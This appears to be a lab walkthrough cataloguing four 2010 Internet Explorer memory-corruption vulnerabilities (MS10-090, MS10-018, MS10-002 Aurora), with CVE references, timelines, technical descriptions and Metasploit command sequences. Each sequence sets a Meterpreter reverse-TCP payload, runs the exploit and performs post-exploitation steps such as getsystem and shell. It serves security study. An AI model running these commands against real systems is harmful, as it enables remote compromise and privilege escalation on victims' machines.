MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption

PoC provided by :

unknown
Matteo Memelli
jduck

Reference(s) :

CVE-2010-3962
MSA-2458511
MS10-090

Affected version(s) :

Internet Explorer 6, 7 & 8

Tested on Windows XP SP3 with :

Internet Explorer 6 (mshtml.dll 6.0.2900.5512)

Description :

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s function pointers. This leads to the program counter being set to the address determined by the address “[vtable+0x30+1]”. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.

Commands :

use exploit/windows/browser/ms10_xxx_ie_css_­clip
set SRVHOST 192.168.178.21
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
getsystem
shell

MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Timeline :

Microsoft MSA981374 advisory release the 2010-03-09
Exploit-DB PoC provided by Trancer the 2010-03-10
Metasploit PoC provided by duck the 2010-03-10
Microsoft patch “KB980182” provided the 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182” provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.

Commands :

use windows/browser/ms10_018_ie_tabular_acti­vex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-002 : Internet Explorer Aurora Memory Corruption

Timeline :

Vulnerability learned by Microsoft the 2010-01-13
Metasploit PoC provided by hdm the 2010-01-15
Exploit-DB PoC provided by Ahmed Obied the 2010-01-17
Microsoft patch “KB978207” provided the 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig